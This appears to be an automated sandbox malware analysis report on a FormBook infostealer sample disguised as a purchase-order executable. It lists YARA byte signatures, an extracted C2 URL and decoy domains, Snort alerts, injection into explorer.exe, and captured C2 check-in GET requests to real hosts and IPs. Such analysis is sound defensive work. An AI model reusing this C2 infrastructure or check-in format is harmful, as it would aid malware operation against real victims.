12.0.quotation New Order I5117.exe.400000.6.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
12.0.quotation New Order I5117.exe.400000.6.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
1.2.quotation New Order I5117.exe.332f218.2.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
12.2.quotation New Order I5117.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
12.2.quotation New Order I5117.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
12.2.quotation New Order I5117.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cc9:$sqlite3step: 68 34 1C 7B E1 0x15ddc:$sqlite3step: 68 34 1C 7B E1 0x15cf8:$sqlite3text: 68 38 2A 90 C5 0x15e1d:$sqlite3text: 68 38 2A 90 C5 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
12.0.quotation New Order I5117.exe.400000.4.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
12.0.quotation New Order I5117.exe.400000.4.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
12.0.quotation New Order I5117.exe.400000.4.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cc9:$sqlite3step: 68 34 1C 7B E1 0x15ddc:$sqlite3step: 68 34 1C 7B E1 0x15cf8:$sqlite3text: 68 38 2A 90 C5 0x15e1d:$sqlite3text: 68 38 2A 90 C5 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 18 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0000000C.00000002.379998349.00000000014B0000.00000040.00020000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.myveguiolcusbyopappgroup.com/n8bs/"], "decoy": ["monese-bank.com", "silkypumps.xyz", "tashabouvier.com", "eduardoleonsilva.com", "pinnaclecorporaterentals.com", "megafluids.com", "worldwidecarfans.com", "benjamlnesq.com", "unitedraxiapp.com", "thetanheroes.com", "jypmore.quest", "indianasheriffs.biz", "saintinstead.com", "alldansmx.com", "trulyproofreading.com", "indotogel369.com", "mermadekusse.store", "radosenterprisellc.com", "gseequalservices.com", "techride.xyz", "2031corp.com", "centelytics.com", "payperlivecalls.com", "iphone13promax.guide", "leadslingerstraining.com", "generateideasint.com", "afgelocal2741.com", "n-visionlearning.com", "strumagokart.quest", "noisesocial.com", "completefilmguide.com", "mawuyrapaulin.com", "heptagonfx.com", "hype-clicks.com", "uxog0.online", "932381.com", "trumpetrofnky.xyz", "samudombang.com", "hairtederionos.com", "10karmy.com", "nangniubanchanviet.online", "brooklynprowellness.com", "rockstarcleaningclub.com", "rollnwin.top", "breastextra.com", "zahad-riedel.com", "xuebqufvcdbgbqypuywgntpy.store", "blogging2success.com", "cnshippingagency.com", "danielquasar.net", "allthingsdog.info", "legaltulsa.com", "pure-impression.store", "jonbeedle.com", "ndtailgateofchampions.com", "steelhorserescue.com", "smart-realy.com", "rebornmkt.com", "zaktheme.xyz", "myfranciscanshoe.com", "linkedinupdate.com", "fulviopires.com", "magicspaces.digital", "avtoshop761.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: quotation New Order I5117.exe

Virustotal: Detection: 22%

Perma Link

Yara detected FormBook

Show sources

Source: Yara match	File source: 12.0.quotation New Order I5117.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.quotation New Order I5117.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.quotation New Order I5117.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.quotation New Order I5117.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.quotation New Order I5117.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.quotation New Order I5117.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.quotation New Order I5117.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.379998349.00000000014B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.544184245.0000000003140000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.297677672.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.542742634.0000000000BE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.298278607.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.379109790.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.380945973.0000000001820000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.301720083.0000000004301000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.353744054.000000000FD3E000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.335216417.000000000FD3E000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.544623033.0000000003170000.00000004.00000001.sdmp, type: MEMORY

Source: 12.0.quotation New Order I5117.exe.400000.8.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 12.0.quotation New Order I5117.exe.400000.6.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 12.0.quotation New Order I5117.exe.400000.4.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 12.2.quotation New Order I5117.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: quotation New Order I5117.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: quotation New Order I5117.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: cmd.pdbUGP source: quotation New Order I5117.exe, 0000000C.00000002.383073394.0000000003660000.00000040.00020000.sdmp, cmd.exe, 00000011.00000000.378473490.0000000000D80000.00000040.00020000.sdmp, cmd.exe, 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp
Source:	Binary string: wntdll.pdbUGP source: quotation New Order I5117.exe, 0000000C.00000002.380477581.000000000160F000.00000040.00000001.sdmp, quotation New Order I5117.exe, 0000000C.00000002.380047974.00000000014F0000.00000040.00000001.sdmp, cmd.exe, 00000011.00000002.547350905.00000000038AF000.00000040.00000001.sdmp, cmd.exe, 00000011.00000002.546370328.0000000003790000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: quotation New Order I5117.exe, 0000000C.00000002.380477581.000000000160F000.00000040.00000001.sdmp, quotation New Order I5117.exe, 0000000C.00000002.380047974.00000000014F0000.00000040.00000001.sdmp, cmd.exe, 00000011.00000002.547350905.00000000038AF000.00000040.00000001.sdmp, cmd.exe, 00000011.00000002.546370328.0000000003790000.00000040.00000001.sdmp
Source:	Binary string: cmd.pdb source: quotation New Order I5117.exe, 0000000C.00000002.383073394.0000000003660000.00000040.00020000.sdmp, cmd.exe, cmd.exe, 00000011.00000000.378473490.0000000000D80000.00000040.00020000.sdmp, cmd.exe, 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp
Source:	Binary string: Arr.pdb source: quotation New Order I5117.exe

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00D8B89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,	17_2_00D8B89C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00D968BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,	17_2_00D968BA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00D9245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,	17_2_00D9245C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00DA31DC FindFirstFileW,FindNextFileW,FindClose,	17_2_00DA31DC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00D885EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	17_2_00D885EA

Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Code function: 4x nop then pop esi		12_2_00415830
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Code function: 4x nop then pop edi		12_2_0040C364

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49805 -> 185.30.32.154:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49805 -> 185.30.32.154:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49805 -> 185.30.32.154:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49820 -> 208.91.197.39:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49820 -> 208.91.197.39:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49820 -> 208.91.197.39:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49821 -> 162.241.2.141:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49821 -> 162.241.2.141:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49821 -> 162.241.2.141:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49823 -> 136.143.191.204:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49823 -> 136.143.191.204:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49823 -> 136.143.191.204:80

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 185.30.32.154 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.zahad-riedel.com
Source: C:\Windows\explorer.exe	Network Connect: 37.123.118.150 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.thetanheroes.com
Source: C:\Windows\explorer.exe	Network Connect: 208.91.197.39 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 15.197.142.173 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.eduardoleonsilva.com
Source: C:\Windows\explorer.exe	Domain query: www.pinnaclecorporaterentals.com
Source: C:\Windows\explorer.exe	Domain query: www.jypmore.quest
Source: C:\Windows\explorer.exe	Domain query: www.mermadekusse.store
Source: C:\Windows\explorer.exe	Domain query: www.indianasheriffs.biz
Source: C:\Windows\explorer.exe	Network Connect: 162.241.2.141 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.myveguiolcusbyopappgroup.com
Source: C:\Windows\explorer.exe	Network Connect: 136.143.191.204 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.144.34.39 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.myveguiolcusbyopappgroup.com/n8bs/

Source: Joe Sandbox View	ASN Name: DE-WEBGOwwwwebgodeDE DE-WEBGOwwwwebgodeDE
Source: Joe Sandbox View	ASN Name: UK2NET-ASGB UK2NET-ASGB

Source: global traffic	HTTP traffic detected: GET /n8bs/?4hJLWJ=iaKVfi2UNf7U4ghXoaW8pCxH8k1QKwprWVQ4tf6BluLH39GjhhtZKTymn1Siq8RobrxN&Mtx=0PvL86-xjV HTTP/1.1Host: www.zahad-riedel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8bs/?4hJLWJ=7H0yjhDg+a+MHwvOt9FlC9FT4fPPwk985azmZpRe8o0S6swRDJgGtBdFue+HEp9ACtz2&Mtx=0PvL86-xjV HTTP/1.1Host: www.jypmore.questConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8bs/?4hJLWJ=c3mmtSef7XE9Y6LEpqTlZ9les/exvmn3T3lrgLyL2qaFXU4A/SjORTIHh9BJbvzbz9Lm&Mtx=0PvL86-xjV HTTP/1.1Host: www.indianasheriffs.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8bs/?4hJLWJ=dFscc3ADPHmy8TWVKvwCOMwU5bUrQa/CizHl44ZiWA9r2IP2TSl8LSycOCDTN0nOZKJt&Mtx=0PvL86-xjV HTTP/1.1Host: www.eduardoleonsilva.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8bs/?4hJLWJ=PuetlOwZFpkKGCq/MJJLd9AYausHszI4yXIJtu+5frxDpsbSPvktMbNWt5V8r6CNrXXm&Mtx=0PvL86-xjV HTTP/1.1Host: www.thetanheroes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8bs/?4hJLWJ=klWsC1oO4pFLOH/ubbPBsuuNG6ECcuE/tWLY9Ci8D79EoLLMyfySTrTS/TXNAHCZkRkB&Mtx=0PvL86-xjV HTTP/1.1Host: www.pinnaclecorporaterentals.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8bs/?4hJLWJ=P1PWYcL+/hkTuAmEUVew+E7DjpBsgHpPBHkumuCE+t//nspYDrLxOzxmHnBKSVqws4Kv&Mtx=0PvL86-xjV HTTP/1.1Host: www.myveguiolcusbyopappgroup.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 37.123.118.150 37.123.118.150

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 10 Jan 2022 07:55:23 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.10.3 (Ubuntu)Date: Mon, 10 Jan 2022 07:55:28 GMTContent-Type: text/htmlContent-Length: 178Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Jan 2022 07:55:44 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: awselb/2.0Date: Mon, 10 Jan 2022 07:55:50 GMTContent-Type: text/htmlContent-Length: 118Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Jan 2022 07:56:00 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Connection: closeTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6

Source: cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	String found in binary or memory: http://customersupport.networksolutions.com/article.php?id=306
Source: quotation New Order I5117.exe, 00000001.00000003.277430713.0000000006494000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.277385231.0000000006493000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.277406552.0000000006494000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.277461034.0000000006494000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: quotation New Order I5117.exe, 00000001.00000003.277430713.0000000006494000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.277385231.0000000006493000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.277406552.0000000006494000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.277461034.0000000006494000.00000004.00000001.sdmp	String found in binary or memory: http://fontfabrik.comos
Source: cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/js/min.js?v2.3
Source: cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/pics/7985/logo.png
Source: cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/pics/7985/netsol-logos.jpg
Source: cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/pics/8934/rcomlogo.jpg
Source: cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	String found in binary or memory: http://www.Indianasheriffs.biz
Source: quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: quotation New Order I5117.exe, 00000001.00000003.279897743.000000000649F000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.com
